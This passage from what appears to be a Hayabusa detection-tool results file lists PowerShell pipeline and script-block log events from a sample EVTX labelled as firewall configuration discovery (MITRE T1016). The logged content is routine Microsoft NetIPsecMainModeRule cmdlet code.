($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, 